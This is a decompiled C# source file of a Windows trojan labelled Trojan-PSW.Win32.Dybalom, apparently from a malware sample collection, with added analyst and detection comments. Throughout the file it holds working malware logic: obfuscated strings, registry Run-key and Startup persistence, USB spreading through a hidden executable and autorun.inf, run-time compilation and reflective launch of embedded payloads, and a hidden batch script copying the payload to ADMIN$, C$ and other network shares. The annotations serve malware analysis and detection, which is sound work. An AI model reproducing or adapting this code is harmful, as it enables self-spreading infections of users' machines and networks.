MalwareSourceCode/MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/YUGFYLIGvlfiyl.cs
2022-08-18 06:28:56 -05:00


// Decompiled with JetBrains decompiler
// Type: YUGFYLIGvlfiyl
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Threading;
using System.Windows.Forms;
public class YUGFYLIGvlfiyl
{
// Cache slots for the four compiler settings that CC() decodes before it builds its CodeDom request.
// urPkJBxJaoKxHfa: language name handed to CodeDomProvider.CreateProvider.
private static string urPkJBxJaoKxHfa;
// DFlGLTJoxxwCYfm and RedtwzrQfYIqsNp: the two entries added to CompilerParameters.ReferencedAssemblies.
private static string DFlGLTJoxxwCYfm;
private static string RedtwzrQfYIqsNp;
// uIFnBaaCKWySxWn: value assigned to CompilerParameters.CompilerOptions.
private static string uIFnBaaCKWySxWn;
// Empty constructor; the members shown in this listing are all static.
[DebuggerNonUserCode]
public YUGFYLIGvlfiyl()
{
}
// String de-obfuscation helper used for every encoded literal in this class.
// JEhjQWpxnTOONSD: encoded text; its LAST character is a per-string offset, not data.
// KRhIIXNQIgKomUJ: key; it is applied character by character and wraps around when exhausted.
// Returns the decoded text, one character shorter than the encoded input.
// Analyst note: the transform is a plain subtraction (encoded - offset - key), so the literals in this
// file can be recovered statically, without executing the sample.
public static string HqBHDPguDENkfJL(string JEhjQWpxnTOONSD, string KRhIIXNQIgKomUJ)
{
char[] charArray1 = JEhjQWpxnTOONSD.ToCharArray();
char[] charArray2 = KRhIIXNQIgKomUJ.ToCharArray();
// Output buffer: input length minus the trailing offset character.
char[] chArray = new char[JEhjQWpxnTOONSD.Length - 2 + 1];
// Take the offset from the final character, then blank that slot.
int num1 = (int) charArray1[JEhjQWpxnTOONSD.Length - 1];
charArray1[JEhjQWpxnTOONSD.Length - 1] = char.MinValue;
int index1 = 0;
int num2 = JEhjQWpxnTOONSD.Length - 1;
for (int index2 = 0; index2 <= num2; ++index2)
{
// The loop bound includes the offset slot; this guard skips it.
if (index2 < JEhjQWpxnTOONSD.Length - 1)
{
// Wrap the key index so a short key covers a longer string.
if (index1 >= charArray2.Length)
index1 = 0;
int num3 = (int) charArray1[index2];
int num4 = (int) charArray2[index1];
// plaintext = encoded - offset - key
int num5 = num3 - num1 - num4;
chArray[index2] = Convert.ToChar(num5);
++index1;
}
}
return new string(chArray);
}
// Persistence watchdog; Main() starts it on its own thread and it never returns.
// Every 5 seconds it checks for a copy of the running executable in the user's ApplicationData folder
// (same file name as the running image). When the copy is missing it is re-created and re-registered
// through gjbzPIrZcwZdrCX, using the file name as the registry value name.
// Response note: while this thread is alive, deleting the dropped copy is undone within seconds, so the
// process has to be stopped before the file and registry value are cleaned up.
public static void CiMbIOhpfLGHFKu()
{
// Target: <ApplicationData>\<file name of the running executable>
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Path.GetFileName(Application.ExecutablePath);
while (true)
{
try
{
if (!System.IO.File.Exists(str))
{
System.IO.File.Copy(Application.ExecutablePath, str);
YUGFYLIGvlfiyl.gjbzPIrZcwZdrCX(Path.GetFileName(Application.ExecutablePath), str);
}
}
catch (Exception ex)
{
// Every failure is discarded; the loop simply tries again on the next pass.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Thread.Sleep(5000);
}
}
// Writes a string value (Name -> Path) under an HKEY_CURRENT_USER subkey opened with write access.
// Applying HqBHDPguDENkfJL to the literal by hand gives "Software\Microsoft\Windows\CurrentVersion\Run",
// i.e. the per-user logon autostart key. No null check on OpenSubKey: a missing key surfaces as an
// exception, which the only caller shown (CiMbIOhpfLGHFKu) swallows.
// Detection note: new HKCU Run values whose data points into the user's ApplicationData folder.
public static void gjbzPIrZcwZdrCX(string Name, string Path) => Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW"), true).SetValue(Name, (object) Path, RegistryValueKind.String);
// Copies the running assembly to "<drive>\erPCyQY.exe" and sets the copy's attributes to Hidden.
// Called by searchDrives() for removable drives; the return value is always null.
// The label/switch scaffolding is the decompiler's rendering of statement-level error resumption (it
// matches the shape VB "On Error Resume Next" compiles to): num3 records the step in progress and the
// filtered catch resumes at the step after the one that threw, so a failed copy does not abort the routine.
// Detection note: a hidden erPCyQY.exe in the root of removable media is an indicator for this sample.
public static object Spread(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
// -2 makes the dispatcher below take its "resume at next step" branch.
num1 = -2;
label_2:
int num3 = 2;
string location = Assembly.GetExecutingAssembly().Location;
label_3:
num3 = 3;
System.IO.File.Copy(location, drive + "\\erPCyQY.exe");
label_4:
num3 = 4;
FileInfo fileInfo = new FileInfo(drive + "\\erPCyQY.exe");
label_5:
num3 = 5;
// Assignment, not a flag OR: Hidden replaces whatever attributes the copy had.
fileInfo.Attributes = FileAttributes.Hidden;
label_6:
obj1 = (object) null;
goto label_13;
// Resume dispatcher: entered from the catch filter, continues at step num2 + 1.
label_8:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_13;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_8;
}
throw ProjectData.CreateProjectError(-2146828237);
label_13:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
// Writes "<drive>\autorun.inf" containing an [AutoRun] section whose Open entry names erPCyQY.exe
// (the file Spread() drops), then sets the .inf file's attributes to Hidden. Always returns null.
// Same decompiled error-resumption scaffolding as Spread(): a step that throws is skipped and
// execution continues with the next one.
// Defender note: current Windows versions do not honour AutoRun "Open" entries on removable drives by
// default, so the hidden autorun.inf / erPCyQY.exe pair is mostly useful as an indicator on USB media.
public static object SetAutorun(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
// -2 makes the dispatcher below take its "resume at next step" branch.
num1 = -2;
label_2:
int num3 = 2;
StreamWriter streamWriter = new StreamWriter(drive + "\\autorun.inf");
label_3:
num3 = 3;
streamWriter.WriteLine("[AutoRun]");
label_4:
num3 = 4;
streamWriter.WriteLine("Open = erPCyQY.exe");
label_5:
num3 = 5;
streamWriter.Close();
label_6:
num3 = 6;
FileInfo fileInfo = new FileInfo(drive + "\\autorun.inf");
label_7:
num3 = 7;
// Assignment, not a flag OR: Hidden replaces the file's previous attributes.
fileInfo.Attributes = FileAttributes.Hidden;
label_8:
obj1 = (object) null;
goto label_15;
// Resume dispatcher: entered from the catch filter, continues at step num2 + 1.
label_10:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_7;
case 8:
goto label_8;
case 9:
goto label_15;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_10;
}
throw ProjectData.CreateProjectError(-2146828237);
label_15:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
// Removable-media polling loop. Each pass sleeps one second, enumerates all drives, and for every drive
// that is Removable, ready, and does not yet contain "\erPCyQY.exe" calls Spread() and SetAutorun().
// When the drive array is exhausted control jumps back to label_2, so the scan repeats indefinitely.
// NOTE(review): as decompiled, no step sets the counter to the value that leads to the exit label
// (label_23), so this method does not appear to return; Main() calls it on the main thread, which would
// make the statements after that call unreachable. Confirm against the IL or dynamically.
// Detection note: one process repeatedly writing erPCyQY.exe and autorun.inf to newly mounted removable drives.
public static void searchDrives()
{
label_1:
int num1;
int num2;
try
{
label_2:
ProjectData.ClearProjectError();
// -2 makes the dispatcher below take its "resume at next step" branch.
num1 = -2;
label_3:
int num3 = 3;
Thread.Sleep(1000);
label_4:
num3 = 4;
DriveInfo[] drives = DriveInfo.GetDrives();
label_5:
num3 = 5;
DriveInfo[] driveInfoArray = drives;
int index = 0;
goto label_16;
label_7:
num3 = 6;
DriveInfo driveInfo;
// Filter 1: only removable drives are considered.
if (driveInfo.DriveType != DriveType.Removable)
goto label_14;
label_8:
num3 = 7;
// Filter 2: skip drives that are not ready (no media).
if (!driveInfo.IsReady)
goto label_13;
label_9:
num3 = 8;
// Filter 3: the marker file doubles as an "already handled" check.
if (System.IO.File.Exists(driveInfo.Name + "\\erPCyQY.exe"))
goto label_12;
label_10:
num3 = 9;
YUGFYLIGvlfiyl.Spread(driveInfo.Name);
label_11:
num3 = 10;
YUGFYLIGvlfiyl.SetAutorun(driveInfo.Name);
label_12:
label_13:
label_14:
++index;
label_15:
num3 = 14;
label_16:
if (index < driveInfoArray.Length)
{
driveInfo = driveInfoArray[index];
goto label_7;
}
else
// End of the drive list: start the next scan pass.
goto label_2;
// Resume dispatcher: entered from the catch filter, continues at step num2 + 1.
label_18:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
case 15:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_7;
case 7:
goto label_8;
case 8:
goto label_9;
case 9:
goto label_10;
case 10:
goto label_11;
case 11:
goto label_12;
case 12:
goto label_13;
case 13:
goto label_14;
case 14:
goto label_15;
case 16:
goto label_23;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_18;
}
throw ProjectData.CreateProjectError(-2146828237);
label_23:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
// Entry point of the sample. In the order shown it: (1) reads its configuration and payload blobs from
// the embedded resource set "H"; (2) writes a transformed payload to <ApplicationData>\<name>.exe;
// (3) compiles embedded source text at run time via CC() and invokes the static method "R" of type
// "MonAMour" with a second payload and that path; (4) starts the persistence watchdog thread;
// (5) attempts further autostart copies; (6) enters the removable-drive loop; (7) contains a
// network-share copy stage driven by a batch file.
// NOTE(review): searchDrives() appears never to return as decompiled, so stage (7) may be dead code here.
[STAThread]
public static void Main()
{
ResourceManager resourceManager = new ResourceManager("H", Assembly.GetExecutingAssembly());
// "K4T8F6c": delimiter-separated configuration string (split below).
string Expression = Conversions.ToString(resourceManager.GetObject("K4T8F6c"));
// FHQnUxOuBUcRwss is not part of this listing; it is constructed from resource "N1HXjA" and its
// DbqjTCEYBFTdyMy method is applied to the Base64-decoded blobs below - presumably a keyed
// decryption/unpacking step (confirm against that class).
FHQnUxOuBUcRwss fhQnUxOuBucRwss = new FHQnUxOuBUcRwss(Conversions.ToString(resourceManager.GetObject("N1HXjA")));
string[] strArray = Strings.Split(Expression, "SuZz5vnl5M1s6Sra");
// Decodes by hand to "True"; used only in the two flag comparisons at the end of the method.
string Right = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("śƕšŽ´", "So8dxq7eL5m3PMUH");
// Drop path: <ApplicationData>\<resource "WggM2">.exe
string str1 = Conversions.ToString(Operators.ConcatenateObject((object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"), Operators.AddObject(resourceManager.GetObject("WggM2"), (object) ".exe")));
try
{
// Clears an earlier drop: kills a process whose name occurs in the drop path, then deletes the file.
// NOTE(review): as decompiled only processes[0] is examined and index is never advanced; the
// original loop shape may have been lost in decompilation.
Process process = (Process) null;
Process[] processes = Process.GetProcesses();
int index = 0;
if (index < processes.Length)
goto label_6;
else
goto label_7;
label_3:
if (System.IO.File.Exists(str1))
{
System.IO.File.Delete(str1);
goto label_9;
}
else
goto label_9;
label_6:
process = processes[index];
if (!str1.Contains(process.ProcessName))
goto label_3;
label_7:
process.Kill();
goto label_3;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_9:
try
{
// Resource "UntJ0": Base64 text -> bytes -> DbqjTCEYBFTdyMy -> written to the drop path (not appended).
MyProject.Computer.FileSystem.WriteAllBytes(str1, fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("UntJ0")))), false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
// Resource "nerdz" holds source text that CC() compiles at run time; the static method MonAMour.R of
// the resulting assembly is invoked with (transformed bytes of resource "tZAsD", drop path).
// What R does with those arguments is not visible in this file.
YUGFYLIGvlfiyl.kXKlIGiQhTXwXic("MonAMour", "R", YUGFYLIGvlfiyl.CC(Conversions.ToString(resourceManager.GetObject("nerdz"))), new object[2]
{
(object) fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("tZAsD")))),
(object) str1
});
// Persistence watchdog (copy in ApplicationData plus Run value), running on its own thread.
new Thread(new ThreadStart(YUGFYLIGvlfiyl.CiMbIOhpfLGHFKu)).Start();
try
{
object environmentVariable = (object) Environment.GetEnvironmentVariable("temp");
// The literal decodes to "Software\Microsoft\Windows\CurrentVersion\Run". OpenSubKey is called here
// without the writable flag, and SetValue on a read-only key throws, so as written the "Win32" value
// and the %temp% copy are not expected; control passes to the catch block instead.
Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW")).SetValue("Win32", Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe"));
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe")));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
// Fallback autostart: copy into the per-user Startup folder.
// Detection note: erPCyQY.exe appearing in the user's Startup folder.
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject((object) Environment.GetFolderPath(Environment.SpecialFolder.Startup), (object) "\\erPCyQY.exe")));
ProjectData.ClearProjectError();
}
// Removable-drive propagation loop (see the NOTE at the top of this method about reachability below).
YUGFYLIGvlfiyl.searchDrives();
// The literal decodes to "\winlogon.exe": str2 is <CurrentUserApplicationData>\winlogon.exe, the
// source path used by the copy commands in the batch file below.
string str2 = MyProject.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData + YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ţƙŲŮūƐſƌŖĶƒŴţ´", "SnULKmdi4TyHJsgC");
try
{
// Both lookups discard their results; the second literal decodes to "workgroup".
Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
Dns.GetHostEntry(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
// Copies the running image to the relative path "workgroup" (decoded) in the current directory.
System.IO.File.Copy(Application.ExecutablePath, YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
// Network-share stage: writes C:\LcvHEwb.bat through late-bound StreamWriter calls and runs it hidden.
// The two encoded lines decode to "@echo off & break off" and "for /f %%t in (log.txt) do ( ";
// together with "net view >log.txt" the script iterates the hosts listed by net view and tries to copy
// str2 to each one's administrative and shared folders as debug.exe.
// Detection notes: creation of C:\LcvHEwb.bat; a hidden cmd child running "net view"; debug.exe
// written to ADMIN$, C$, D$, E$, IPC$ or PRINT$ on several hosts from a single workstation.
object Instance = (object) new StreamWriter("C:\\LcvHEwb.bat");
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŇŪŇŶƒĥŚƊƐĝłħƄƙŒžŲĥœŴƉ´", "SQ0ZoQ7pvIhSns9i")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) "net view >log.txt"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŭƑųōīşĘłĬšļƇƄŁŏƕŶƉįơŴŭġĽūŜļņĶ´", "SnMyHEDiS9hjbmsu")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\IPC$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\ADMIN$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\D$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\PRINT$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\d$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ")"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "Close", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
new Process()
{
StartInfo = {
WindowStyle = ProcessWindowStyle.Hidden,
FileName = "C:\\LcvHEwb.bat"
}
}.Start();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
// Configuration fields 2 and 4 are compared with "True", but both branches are empty in the decompiled
// output, so these flags have no effect in the code shown.
if (Operators.CompareString(strArray[2], Right, false) != 0)
;
if (Operators.CompareString(strArray[4], Right, false) != 0)
;
}
// Reflection trampoline: looks up type Class in the given assembly, then method Void on that type, and
// invokes it with a null target (i.e. as a static method) passing Parameters.
// Returns the method's result converted to bool. When the type or method is missing, or anything
// throws, the local is returned without having been assigned in this decompiled form - presumably
// false, the default, in the original IL.
// Analyst note: Main() calls this with the assembly produced by CC(), so the invoked code exists only
// in the run-time compiled assembly and not as a type in this decompiled file.
private static bool kXKlIGiQhTXwXic(
string Class,
string Void,
Assembly file,
object[] Parameters)
{
bool boolean;
try
{
System.Type type = file.GetType(Class);
if ((object) type != null)
{
MethodInfo method = type.GetMethod(Void);
if ((object) method != null)
{
boolean = Conversions.ToBoolean(method.Invoke((object) null, Parameters));
goto label_6;
}
}
}
catch (Exception ex)
{
// Lookup and invocation errors are discarded.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_6:
return boolean;
}
// Compiles the supplied source text at run time with CodeDom and returns the resulting assembly
// (library output, GenerateInMemory = true, warnings not treated as errors).
// Decoding the four literals by hand with HqBHDPguDENkfJL gives: language "CSharp", references
// "System.dll" and "System.Management.dll", compiler options "/platform:x86".
// No check of the compiler results is made before CompiledAssembly is read.
// Detection note: on .NET Framework, CodeDom compilation launches the C# compiler (csc.exe) and uses
// temporary files even when GenerateInMemory is set, so csc.exe spawned by a non-developer executable
// is a useful behavioural signal for this stage.
public static Assembly CC(string Source)
{
YUGFYLIGvlfiyl.urPkJBxJaoKxHfa = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("űƖŵƦƶǀÛ", "Sh2jiulGpHtnnVzW");
YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƾǃƂƩƱŏƬơƺÛ", "Sju3iiFmZsEiQdJe");
YUGFYLIGvlfiyl.RedtwzrQfYIqsNp = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƜƜƜƔǁĺƀųƞƣƆŵƮƍƍƢőƍƔƛÛ", "SHNMTy1X7UgD5fMD");
YUGFYLIGvlfiyl.uIFnBaaCKWySxWn = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ĐńŔŒņĬŲũŐğųĞĬ\u008E", "SFZcD8uiUWmXhX8w");
CompilerParameters options = new CompilerParameters();
CodeDomProvider provider = CodeDomProvider.CreateProvider(YUGFYLIGvlfiyl.urPkJBxJaoKxHfa);
// Library output, loaded into the current process rather than kept as a named file.
options.GenerateExecutable = false;
options.GenerateInMemory = true;
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm);
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.RedtwzrQfYIqsNp);
options.CompilerOptions = YUGFYLIGvlfiyl.uIFnBaaCKWySxWn;
options.TreatWarningsAsErrors = false;
return provider.CompileAssemblyFromSource(options, Source).CompiledAssembly;
}
}